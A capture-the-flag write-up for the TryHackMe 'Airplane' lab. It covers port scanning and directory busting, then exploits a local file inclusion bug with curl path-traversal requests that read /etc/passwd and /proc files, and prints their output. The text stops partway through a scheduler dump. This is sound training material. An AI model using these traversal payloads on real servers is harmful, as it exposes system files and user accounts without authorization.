💻
TryHackMe Writeups
  • Dodge
  • Reset
  • Hack Smarter Security
  • Creative
  • CyberLens
  • Include
  • Airplane
  • mKingdom
  • Publisher
  • The London Bridge
  • Pyrat
  • Cheese CTF
Powered by GitBook
On this page

Airplane

Are you ready to fly?

PreviousIncludeNextmKingdom

Last updated 11 months ago

This work by Manav G Krishna is licensed under

Machine IP: 10.10.116.253

Nmap Scan:

nmap -p- -A -v --min-rate 100 -oN airplane_thm -Pn 10.10.116.253

Nmap scan report for 10.10.116.253
Host is up (0.20s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 b8:64:f7:a9:df:29:3a:b5:8a:58:ff:84:7c:1f:1a:b7 (RSA)
|   256 ad:61:3e:c7:10:32:aa:f1:f2:28:e2:de:cf:84:de:f0 (ECDSA)
|_  256 a9:d8:49:aa:ee:de:c4:48:32:e4:f1:9e:2a:8a:67:f0 (ED25519)
6048/tcp open  x11?
8000/tcp open  http-alt Werkzeug/3.0.2 Python/3.8.10
|_http-server-header: Werkzeug/3.0.2 Python/3.8.10
|_http-title: Did not follow redirect to http://airplane.thm:8000/?page=index.html
| http-methods: 
|_  Supported Methods: OPTIONS HEAD GET
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 NOT FOUND
|     Server: Werkzeug/3.0.2 Python/3.8.10
|     Date: Fri, 07 Jun 2024 18:35:44 GMT
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 207
|     Connection: close
|     <!doctype html>
|     <html lang=en>
|     <title>404 Not Found</title>
|     <h1>Not Found</h1>
|     <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
|   GetRequest: 
|     HTTP/1.1 302 FOUND
|     Server: Werkzeug/3.0.2 Python/3.8.10
|     Date: Fri, 07 Jun 2024 18:35:39 GMT
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 269
|     Location: http://airplane.thm:8000/?page=index.html
|     Connection: close
|     <!doctype html>
|     <html lang=en>
|     <title>Redirecting...</title>
|     <h1>Redirecting...</h1>
|     <p>You should be redirected automatically to the target URL: <a href="http://airplane.thm:8000/?page=index.html">http://airplane.thm:8000/?page=index.html</a>. If not, click the link.
|   Socks5: 
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|     "http://www.w3.org/TR/html4/strict.dtd">
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 400</p>
|     <p>Message: Bad request syntax ('
|     ').</p>
|     <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p>
|     </body>
|_    </html>
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8000-TCP:V=7.94SVN%I=7%D=6/8%Time=666352F6%P=x86_64-pc-linux-gnu%r(
SF:GetRequest,1F3,"HTTP/1\.1\x20302\x20FOUND\r\nServer:\x20Werkzeug/3\.0\.
SF:2\x20Python/3\.8\.10\r\nDate:\x20Fri,\x2007\x20Jun\x202024\x2018:35:39\
SF:x20GMT\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Lengt
SF:h:\x20269\r\nLocation:\x20http://airplane\.thm:8000/\?page=index\.html\
SF:r\nConnection:\x20close\r\n\r\n<!doctype\x20html>\n<html\x20lang=en>\n<
SF:title>Redirecting\.\.\.</title>\n<h1>Redirecting\.\.\.</h1>\n<p>You\x20
SF:should\x20be\x20redirected\x20automatically\x20to\x20the\x20target\x20U
SF:RL:\x20<a\x20href=\"http://airplane\.thm:8000/\?page=index\.html\">http
SF:://airplane\.thm:8000/\?page=index\.html</a>\.\x20If\x20not,\x20click\x
SF:20the\x20link\.\n")%r(FourOhFourRequest,184,"HTTP/1\.1\x20404\x20NOT\x2
SF:0FOUND\r\nServer:\x20Werkzeug/3\.0\.2\x20Python/3\.8\.10\r\nDate:\x20Fr
SF:i,\x2007\x20Jun\x202024\x2018:35:44\x20GMT\r\nContent-Type:\x20text/htm
SF:l;\x20charset=utf-8\r\nContent-Length:\x20207\r\nConnection:\x20close\r
SF:\n\r\n<!doctype\x20html>\n<html\x20lang=en>\n<title>404\x20Not\x20Found
SF:</title>\n<h1>Not\x20Found</h1>\n<p>The\x20requested\x20URL\x20was\x20n
SF:ot\x20found\x20on\x20the\x20server\.\x20If\x20you\x20entered\x20the\x20
SF:URL\x20manually\x20please\x20check\x20your\x20spelling\x20and\x20try\x2
SF:0again\.</p>\n")%r(Socks5,213,"<!DOCTYPE\x20HTML\x20PUBLIC\x20\"-//W3C/
SF:/DTD\x20HTML\x204\.01//EN\"\n\x20\x20\x20\x20\x20\x20\x20\x20\"http://w
SF:ww\.w3\.org/TR/html4/strict\.dtd\">\n<html>\n\x20\x20\x20\x20<head>\n\x
SF:20\x20\x20\x20\x20\x20\x20\x20<meta\x20http-equiv=\"Content-Type\"\x20c
SF:ontent=\"text/html;charset=utf-8\">\n\x20\x20\x20\x20\x20\x20\x20\x20<t
SF:itle>Error\x20response</title>\n\x20\x20\x20\x20</head>\n\x20\x20\x20\x
SF:20<body>\n\x20\x20\x20\x20\x20\x20\x20\x20<h1>Error\x20response</h1>\n\
SF:x20\x20\x20\x20\x20\x20\x20\x20<p>Error\x20code:\x20400</p>\n\x20\x20\x
SF:20\x20\x20\x20\x20\x20<p>Message:\x20Bad\x20request\x20syntax\x20\('\\x
SF:05\\x04\\x00\\x01\\x02\\x80\\x05\\x01\\x00\\x03'\)\.</p>\n\x20\x20\x20\
SF:x20\x20\x20\x20\x20<p>Error\x20code\x20explanation:\x20HTTPStatus\.BAD_
SF:REQUEST\x20-\x20Bad\x20request\x20syntax\x20or\x20unsupported\x20method
SF:\.</p>\n\x20\x20\x20\x20</body>\n</html>\n");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=6/8%OT=22%CT=1%CU=32666%PV=Y%DS=2%DC=T%G=Y%TM=66635
OS:3B0%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=108%TI=Z%CI=Z%II=I%TS=A)S
OS:EQ(SP=102%GCD=1%ISR=108%TI=Z%CI=Z%II=I%TS=A)SEQ(SP=102%GCD=5%ISR=109%TI=
OS:Z%CI=Z%II=I%TS=A)OPS(O1=M508ST11NW7%O2=M508ST11NW7%O3=M508NNT11NW7%O4=M5
OS:08ST11NW7%O5=M508ST11NW7%O6=M508ST11)WIN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3
OS:%W5=F4B3%W6=F4B3)ECN(R=Y%DF=Y%T=40%W=F507%O=M508NNSNW7%CC=Y%Q=)T1(R=Y%DF
OS:=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z
OS:%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=
OS:Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%
OS:RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)
OS:IE(R=Y%DFI=N%T=40%CD=S)

Uptime guess: 17.468 days (since Tue May 21 12:54:49 2024)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 8888/tcp)
HOP RTT       ADDRESS
1   160.98 ms 10.11.0.1
2   161.10 ms 10.10.116.253

From the scan, we can see ports 22, 6048, and 8000 open and also there is a domain named airplane.thm which can be seen in the http-title part.

Hosts file entry: echo '10.10.116.253 airplane.thm' | sudo tee -a /etc/hosts

Checking out port 6048:

The Nmap Scan says that the service running on this port might be x11. It is not certain as it gives a question mark (x11?). Let us now check out resources to pentest this service anyways.

Ports 6000-6063 is where we typically find the x11 service:

SpeedGuide also mentions: Known Unauthorized Use on port 6003.

Pentesting X11:

HackTricks mentions that we could check if we can connect anonymously to the x11 port. From the information that we got from SpeedGuide, only port 6003 has been identified as being susceptible to unauthorized access, but in our case x11 might be running on port 6048, but we can still try to check for anonymous connection via the scanner auxiliary module present in Metasploit to see what we get.

This shows we can't connect anonymously to the port 6048. This is pretty much a dead end now. HackTricks didn't have anything else that was worth testing out for x11.

Now we can look at port 8000.

Checking out port 8000:

From the Nmap Scan we can see that server running on this port is a Python web server utilizing Werkzeug.

We can do some directory busting:

Command:

dirsearch -u http://airplane.thm:8000 -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 100

There is a path named /airplane. Checking it out:

Nothing interesting here.

Upon browsing http://airplane.thm:8000 we are redirected to http://airplane.thm:8000/?page=index.html.

There is a parameter in the URL named page (?page=) and the first thing that comes to mind is LFI (Local File Inclusion).

We can now try to traverse/climb the directory tree to fetch files such as /etc/passwd etc. and doing it via the terminal would be a lot more easier:

Command:

curl --output - http://airplane.thm:8000/\?page\=../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:115::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:109:116:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:110:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
rtkit:x:111:117:RealtimeKit,,,:/proc:/usr/sbin/nologin
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
cups-pk-helper:x:113:120:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false
avahi:x:115:121:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
saned:x:117:123::/var/lib/saned:/usr/sbin/nologin
nm-openvpn:x:118:124:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin
hplip:x:119:7:HPLIP system user,,,:/run/hplip:/bin/false
whoopsie:x:120:125::/nonexistent:/bin/false
colord:x:121:126:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
fwupd-refresh:x:122:127:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
geoclue:x:123:128::/var/lib/geoclue:/usr/sbin/nologin
pulse:x:124:129:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
gnome-initial-setup:x:125:65534::/run/gnome-initial-setup/:/bin/false
gdm:x:126:131:Gnome Display Manager:/var/lib/gdm3:/bin/false
sssd:x:127:132:SSSD system user,,,:/var/lib/sss:/usr/sbin/nologin
carlos:x:1000:1000:carlos,,,:/home/carlos:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
hudson:x:1001:1001::/home/hudson:/bin/bash
sshd:x:128:65534::/run/sshd:/usr/sbin/nologin

We indeed have successful LFI.

From the /etc/passwd file contents we have two users other than root having a console, that is hudson and carlos. Trying to fetch the ssh private key (id_rsa) of these users, the user.txt flag etc. didn't yield any results.

Now let us try to fetch some files from the /proc file system (It provides detailed information about kernel, processes, and configuration parameters in a structured manner under the /proc directory):

  1. /proc/self/cmdline: It is a file that contains the command line arguments that were used to start the current process.

Command:

curl --output - http://airplane.thm:8000/\?page\=../../../../proc/self/cmdline

It outputs: /usr/bin/python3app.py. This shows that, the current process that is running is app.py.

We can now try to fetch the app.py file:

Command:

curl --output - http://airplane.thm:8000/\?page\=../app.py

There is nothing of interest in here.

  1. /proc/sched_debug: It is a file that can be used to retrieve running processes. It provides information about the state of the Linux scheduler.

Command:

curl --output - http://airplane.thm:8000/\?page\=../../../../proc/sched_debug
Sched Debug Version: v0.11, 5.4.0-139-generic #156-Ubuntu
ktime                                   : 643026.363157
sched_clk                               : 643036.796476
cpu_clk                                 : 643029.398816
jiffies                                 : 4295053041Wewe
sched_clock_stable()                    : 1

sysctl_sched
  .sysctl_sched_latency                    : 12.000000
  .sysctl_sched_min_granularity            : 1.500000
  .sysctl_sched_wakeup_granularity         : 2.000000
  .sysctl_sched_child_runs_first           : 0
  .sysctl_sched_features                   : 2042683
  .sysctl_sched_tunable_scaling            : 1 (logarithmic)

cpu#0, 2499.998 MHz
  .nr_running                    : 1
  .nr_switches                   : 145394
  .nr_load_updates               : 0
  .nr_uninterruptible            : -15
  .next_balance                  : 4295.053041
  .curr->pid                     : 1191
  .clock                         : 643028.641740
  .clock_task                    : 643028.641740
  .avg_idle                      : 893338
  .max_idle_balance_cost         : 500000

cfs_rq[0]:/autogroup-103
  .exec_clock                    : 0.000000
  .MIN_vruntime                  : 0.000001
  .min_vruntime                  : 4.659338
  .max_vruntime                  : 0.000001
  .spread                        : 0.000000
  .spread0                       : -15767.298259
  .nr_spread_over                : 0
  .nr_running                    : 0
  .load                          : 0
  .runnable_weight               : 0
  .load_avg                      : 0
  .runnable_load_avg             : 0
  .util_avg                      : 0
  .util_est_enqueued             : 0
  .removed.load_avg              : 0
  .removed.util_avg              : 0
  .removed.runnable_sum          : 0
  .tg_load_avg_contrib           : 0
  .tg_load_avg                   : 0
  .throttled                     : 0
  .throttle_count                : 0
  .se->exec_start                : 642576.238699
  .se->vruntime                  : 15766.000671
  .se->sum_exec_runtime          : 2.423764
  .se->load.weight               : 2
  .se->runnable_weight           : 2
  .se->avg.load_avg              : 0
  .se->avg.util_avg              : 0
  .se->avg.runnable_load_avg     : 0

cfs_rq[0]:/autogroup-75
  .exec_clock                    : 0.000000
  .MIN_vruntime                  : 0.000001
  .min_vruntime                  : 118.480460
  .max_vruntime                  : 0.000001
  .spread                        : 0.000000
  .spread0                       : -15653.477137
  .nr_spread_over                : 0
  .nr_running                    : 1
  .load                          : 1048576
  .runnable_weight               : 1048576
  .load_avg                      : 1024
  .runnable_load_avg             : 1024
  .util_avg                      : 512
  .util_est_enqueued             : 0
  .removed.load_avg              : 0
  .removed.util_avg              : 0
  .removed.runnable_sum          : 0
  .tg_load_avg_contrib           : 1024
  .tg_load_avg                   : 1024
  .throttled                     : 0
  .throttle_count                : 0
  .se->exec_start                : 643028.641740
  .se->vruntime                  : 15766.092635
  .se->sum_exec_runtime          : 117.283029
  .se->load.weight               : 1048576
  .se->runnable_weight           : 1048576
  .se->avg.load_avg              : 1020
  .se->avg.util_avg              : 512
  .se->avg.runnable_load_avg     : 1020

cfs_rq[0]:/
  .exec_clock                    : 0.000000
  .MIN_vruntime                  : 0.000001
  .min_vruntime                  : 15771.957597
  .max_vruntime                  : 0.000001
  .spread                        : 0.000000
  .spread0                       : 0.000000
  .nr_spread_over                : 0
  .nr_running                    : 1
  .load                          : 1048576
  .runnable_weight               : 1048576
  .load_avg                      : 1020
  .runnable_load_avg             : 1020
  .util_avg                      : 512
  .util_est_enqueued             : 513
  .removed.load_avg              : 0
  .removed.util_avg              : 0
  .removed.runnable_sum          : 0
  .tg_load_avg_contrib           : 0
  .tg_load_avg                   : 0
  .throttled                     : 0
  .throttle_count                : 0

rt_rq[0]:
  .rt_nr_running                 : 0
  .rt_nr_migratory               : 0
  .rt_throttled                  : 0
  .rt_time                       : 0.000000
  .rt_runtime                    : 950.000000

dl_rq[0]:
  .dl_nr_running                 : 0
  .dl_nr_migratory               : 0
  .dl_bw->bw                     : 996147
  .dl_bw->total_bw               : 0

runnable tasks:
 S           task   PID         tree-key  switches  prio     wait-time             sum-exec        sum-sleep
-----------------------------------------------------------------------------------------------------------
 I         rcu_gp     3         7.951420         2   100         0.000000         0.000000         0.000000 0 0 /
 I     rcu_par_gp     4         9.951419         2   100         0.000000         0.000000         0.000000 0 0 /
 I   kworker/0:0H     6       576.469184         4   100         0.000000         0.032862         0.000000 0 0 /
 I   kworker/u4:0     7     13329.010579       455   120         0.000000        16.805936         0.000000 0 0 /
 I   mm_percpu_wq     8        16.019073         2   100         0.000000         0.000000         0.000000 0 0 /
 S    ksoftirqd/0     9     15656.083264       845   120         0.000000       198.588077         0.000000 0 0 /
 S    migration/0    11        22.019070       248     0         0.000000         3.600801         0.000000 0 0 /
 S  idle_inject/0    12         0.000000         3    49         0.000000         0.000000         0.000000 0 0 /
 I    kworker/0:1    13     10173.535527      1044   120         0.000000        42.520695         0.000000 0 0 /
 S        cpuhp/0    14       775.339778        11   120         0.000000         0.282868         0.000000 0 0 /
 S     oom_reaper    27        49.019055         2   120         0.000000         0.000000         0.000000 0 0 /
 I      writeback    28        49.019055         2   100         0.000000         0.000000         0.000000 0 0 /
 S           ksmd    30        51.019053         2   125         0.000000         0.000000         0.000000 0 0 /
 I    kintegrityd    77        57.914847         2   100         0.000000         0.000000         0.000000 0 0 /
 I blkcg_punt_bio    79        57.914847         2   100         0.000000         0.000000         0.000000 0 0 /
 I        ata_sff    81        58.058834         2   100         0.000000         0.000000         0.000000 0 0 /
 I    edac-poller    83        58.064044         2   100         0.000000         0.000000         0.000000 0 0 /
 S      watchdogd    85         5.999997         2     0         0.000000         0.000000         0.000000 0 0 /
 Iacpi_thermal_pm    92        81.546320         2   100         0.000000         0.023792         0.000000 0 0 /
 Ivfio-irqfd-clea    93        87.560759         2   100         0.000000         0.016218         0.000000 0 0 /
 I          kstrp   103       144.308544         2   100         0.000000         0.014149         0.000000 0 0 /
 Icharger_manager   120       231.333397         2   100         0.000000         0.013072         0.000000 0 0 /
 I   kworker/u4:2   159     15765.985416       314   120         0.000000        10.876708         0.000000 0 0 /
 Iext4-rsv-conver   182       520.732899         2   100         0.000000         0.013890         0.000000 0 0 /
 I   kworker/0:1H   195     15745.578681       241   100         0.000000         2.020911         0.000000 0 0 /
 I    kworker/0:3   251     15766.674391      2325   120         0.000000        54.519100         0.000000 0 0 /
 S  systemd-udevd   262       926.247795      2705   120         0.000000      1656.840932         0.000000 0 0 /autogroup-22
 S          loop0   263      2048.701580         7   100         0.000000         0.081773         0.000000 0 0 /
 S          loop2   266      5234.758513        77   100         0.000000         1.051606         0.000000 0 0 /
 S          loop3   267      9515.960645       160   100         0.000000         9.817005         0.000000 0 0 /
 S          loop5   269      5234.758504        95   100         0.000000         1.580124         0.000000 0 0 /
 Ssystemd-timesyn   299        98.458179        92   120         0.000000       105.387526         0.000000 0 0 /autogroup-30
 S     sd-resolve   305        96.548621        14   120         0.000000         2.602234         0.000000 0 0 /autogroup-30
 Ssystemd-resolve   303        18.153143       158   120         0.000000       120.435021         0.000000 0 0 /autogroup-32
 I         cryptd   332      2135.784467         2   100         0.000000         0.008300         0.000000 0 0 /
 Saccounts-daemon   365        24.110079       150   120         0.000000        20.448992         0.000000 0 0 /autogroup-35
 S          gmain   429        31.329159       755   120         0.000000        24.976210         0.000000 0 0 /autogroup-35
 S           cron   372         3.278111        23   120         0.000000         5.197933         0.000000 0 0 /autogroup-40
 S    dbus-daemon   375       379.576173      6230   120         0.000000       834.752015         0.000000 0 0 /autogroup-42
 S          gmain   523        30.900772       159   120         0.000000        10.431751         0.000000 0 0 /autogroup-43
 S          gdbus   524        29.116567       382   120         0.000000        15.058144         0.000000 0 0 /autogroup-43
 S        polkitd   386        49.614823       875   120         0.000000       100.095068         0.000000 0 0 /autogroup-52
 S          gdbus   483        47.320322       771   120         0.000000        41.827413         0.000000 0 0 /autogroup-52
 S    in:imuxsock   457        18.486386       627   120         0.000000        22.737789         0.000000 0 0 /autogroup-50
 S      in:imklog   458         9.602643         6   120         0.000000         1.505662         0.000000 0 0 /autogroup-50
 S  rs:main Q:Reg   459        18.495937       625   120         0.000000        18.856878         0.000000 0 0 /autogroup-50
 S          snapd   469      3990.714680     38856   120         0.000000       469.086145         0.000000 0 0 /autogroup-55
 S          snapd   487      3996.608242      8362   120         0.000000      2499.630735         0.000000 0 0 /autogroup-55
 S          snapd   576      3652.070784       239   120         0.000000        46.222254         0.000000 0 0 /autogroup-55
 S          snapd   577      3995.582998      7363   120         0.000000      2153.509279         0.000000 0 0 /autogroup-55
 S          snapd  1006       504.738523         1   120         0.000000         0.084869         0.000000 0 0 /autogroup-55
 S        udisksd   396        41.598891       184   120         0.000000        48.330841         0.000000 0 0 /autogroup-56
 S          gmain   462         8.175916         4   120         0.000000         0.057962         0.000000 0 0 /autogroup-56
 S        cleanup   551        43.422422         7   120         0.000000         0.383982         0.000000 0 0 /autogroup-56
 S wpa_supplicant   399         6.871813       105   120         0.000000        10.243871         0.000000 0 0 /autogroup-58
 S   avahi-daemon   433         4.484454         3   120         0.000000         0.150552         0.000000 0 0 /autogroup-38
 S   ModemManager   518        21.042328       175   120         0.000000        56.427785         0.000000 0 0 /autogroup-70
 S          gmain   540        11.660073         2   120         0.000000         0.054628         0.000000 0 0 /autogroup-70
 S          gdbus   562        21.893807        55   120         0.000000         5.296438         0.000000 0 0 /autogroup-70
 S      gdbserver   529         4.507783        28   120         0.000000         6.645510         0.000000 0 0 /autogroup-74
>R        python3  1191       118.480460         1   120         0.000000         0.135038         0.000000 0 0 /autogroup-75
 Samazon-ssm-agen   600        47.293914       757   120         0.000000        10.483550         0.000000 0 0 /autogroup-81
 Samazon-ssm-agen   622        53.251912       481   120         0.000000        39.873305         0.000000 0 0 /autogroup-81
 S       whoopsie   557        12.093363        48   120         0.000000        14.585748         0.000000 0 0 /autogroup-84
 S          gdbus   573        13.844009        32   120         0.000000         3.465150         0.000000 0 0 /autogroup-84
 S           gdm3   644        68.782791       114   120         0.000000        23.860067         0.000000 0 0 /autogroup-95
 S          gdbus   657        68.887483       192   120         0.000000         9.339251         0.000000 0 0 /autogroup-95
 S   rtkit-daemon   680         4.659338       140   120         0.000000         4.085816         0.000000 0 0 /autogroup-103
 S          gdbus   714        54.991941       101   120         0.000000         4.974203         0.000000 0 0 /autogroup-95
 S         agetty   721        -2.984186        10   120         0.000000         4.314288         0.000000 0 0 /autogroup-107
 S  gdm-x-session   727       128.878531        32   120         0.000000         8.796583         0.000000 0 0 /autogroup-105
 S          gmain   730       127.187166         5   120         0.000000         0.121225         0.000000 0 0 /autogroup-105
 S          gdbus   738       127.014022        18   120         0.000000         1.231093         0.000000 0 0 /autogroup-105
 S           Xorg   731      2382.425366      3045   120         0.000000       530.953060         0.000000 0 0 /autogroup-105
 Sdbus-run-sessio   740       136.445403         3   120         0.000000         1.505559         0.000000 0 0 /autogroup-105
 S          gmain   763      1171.332031         3   120         0.000000         0.236895         0.000000 0 0 /autogroup-105
 S   dconf worker   767       374.877242        18   120         0.000000         0.963325         0.000000 0 0 /autogroup-105
 S    dbus-daemon   750      1667.093292       115   120         0.000000        10.709076         0.000000 0 0 /autogroup-105
 S          gmain   785      2382.579937       163   120         0.000000        10.590783         0.000000 0 0 /autogroup-105
 S   dconf worker   788       945.627200        93   120         0.000000         3.917499         0.000000 0 0 /autogroup-105
 S     llvmpipe-0   790      2384.422537       614   120         0.000000       678.281802         0.000000 0 0 /autogroup-105
 S      JS Helper   795      2380.681540       147   120         0.000000        23.264097         0.000000 0 0 /autogroup-105
 S      JS Helper   796      2380.808932       144   120         0.000000        64.400907         0.000000 0 0 /autogroup-105
 S    ibus-daemon   811      1134.738527        75   120         0.000000        18.346020         0.000000 0 0 /autogroup-105
 S          gdbus   815      1134.883646        54   120         0.000000         5.684664         0.000000 0 0 /autogroup-105
 S     ibus-dconf   814       852.512278        16   120         0.000000        12.829576         0.000000 0 0 /autogroup-105
 S          gdbus   822       858.078513        12   120         0.000000         0.533468         0.000000 0 0 /autogroup-105
 S   dconf worker   823       858.740608         9   120         0.000000         0.371751         0.000000 0 0 /autogroup-105
 S          gmain   824       864.855220         2   120         0.000000         0.067120         0.000000 0 0 /autogroup-105
 S    ibus-portal   821      1115.854232        64   120         0.000000         7.063153         0.000000 0 0 /autogroup-105
 S          gdbus   831      1115.943688        67   120         0.000000         6.369954         0.000000 0 0 /autogroup-105
 Sat-spi2-registr   827      2341.918442       105   120         0.000000        10.427788         0.000000 0 0 /autogroup-105
 S          gmain   835       905.419600         2   120         0.000000         0.027222         0.000000 0 0 /autogroup-105
 S        upowerd   840        27.640840        85   120         0.000000        53.843959         0.000000 0 0 /autogroup-109
 S          gmain   847        20.399457         4   120         0.000000         0.051108         0.000000 0 0 /autogroup-109
 S          gdbus   848        27.257413        51   120         0.000000         4.424208         0.000000 0 0 /autogroup-109
 S            gjs   859      1613.882310        38   120         0.000000        61.601311         0.000000 0 0 /autogroup-105
 S    gsd-sharing   868      1150.038231        61   120         0.000000        13.210878         0.000000 0 0 /autogroup-105
 S   dconf worker   908      1611.470649        12   120         0.000000         0.384460         0.000000 0 0 /autogroup-105
 S          gdbus   912      1150.112028        60   120         0.000000         5.190680         0.000000 0 0 /autogroup-105
 S          gmain   944      1226.627349         2   120         0.000000         0.046870         0.000000 0 0 /autogroup-105
 S   dconf worker   945      1611.456645        14   120         0.000000         0.381226         0.000000 0 0 /autogroup-105
 S   dconf worker   929      1611.451191        25   120         0.000000         0.739001         0.000000 0 0 /autogroup-105
 S          gmain   900      1072.678199         1   120         0.000000         0.039722         0.000000 0 0 /autogroup-105
 S     gsd-rfkill   874      1150.036648        76   120         0.000000         9.602307         0.000000 0 0 /autogroup-105
 S          gmain   894      1072.340516         1   120         0.000000         0.047320         0.000000 0 0 /autogroup-105
 S          gdbus   895      1150.106270        94   120         0.000000         5.513711         0.000000 0 0 /autogroup-105
 S  gsd-smartcard   875      1150.039898        84   120         0.000000        12.542825         0.000000 0 0 /autogroup-105
 S          gdbus   896      1150.112908        53   120         0.000000         3.900217         0.000000 0 0 /autogroup-105
 S   gsd-datetime   876      1150.039972        66   120         0.000000        27.151397         0.000000 0 0 /autogroup-105
 S          gmain   936      1094.571083         2   120         0.000000         0.063303         0.000000 0 0 /autogroup-105
 S          gdbus   946      1150.108422        56   120         0.000000         2.230710         0.000000 0 0 /autogroup-105
 S          gmain   937      1096.782583         2   120         0.000000         0.059144         0.000000 0 0 /autogroup-105
 S          gdbus   940      1678.019534       118   120         0.000000         8.326697         0.000000 0 0 /autogroup-105
 S          gmain   891      1072.833040         1   120         0.000000         0.039843         0.000000 0 0 /autogroup-105
 Sgsd-a11y-settin   884      1150.037197        53   120         0.000000         7.799463         0.000000 0 0 /autogroup-105
 S          gdbus   890      1150.148199        38   120         0.000000         3.211692         0.000000 0 0 /autogroup-105
 S   dconf worker   925      1082.330483        10   120         0.000000         0.258995         0.000000 0 0 /autogroup-105
 Sgsd-housekeepin   887      2381.590662        95   120         0.000000        16.010553         0.000000 0 0 /autogroup-105
 S          gmain   898      1073.276581         3   120         0.000000         0.983385         0.000000 0 0 /autogroup-105
 S          gmain   931      1084.337674         1   120         0.000000         0.051395         0.000000 0 0 /autogroup-105
 S    gsd-printer   924      1677.905455        65   120         0.000000        19.022057         0.000000 0 0 /autogroup-105
 S          gdbus   962      1677.984285        68   120         0.000000         2.247328         0.000000 0 0 /autogroup-105
 Sibus-engine-sim   941      1108.325927        52   120         0.000000         6.467079         0.000000 0 0 /autogroup-105
 S          gmain   963      1110.591027         1   120         0.000000         0.035722         0.000000 0 0 /autogroup-105
 S          gdbus   964      1111.343121        30   120         0.000000         0.877817         0.000000 0 0 /autogroup-105
 S         colord   965        54.009186       183   120         0.000000       120.477768         0.000000 0 0 /autogroup-114
 S          gdbus   974        30.252733       142   120         0.000000         7.066562         0.000000 0 0 /autogroup-114
 S          sleep  1189       558.153193         3   120         0.000000         0.485092         0.000000 0 0 /autogroup-36

cpu#1, 2499.998 MHz
  .nr_running                    : 0
  .nr_switches                   : 141989
  .nr_load_updates               : 0
  .nr_uninterruptible            : 15
  .next_balance                  : 4295.053017
  .curr->pid                     : 0
  .clock                         : 643028.517425
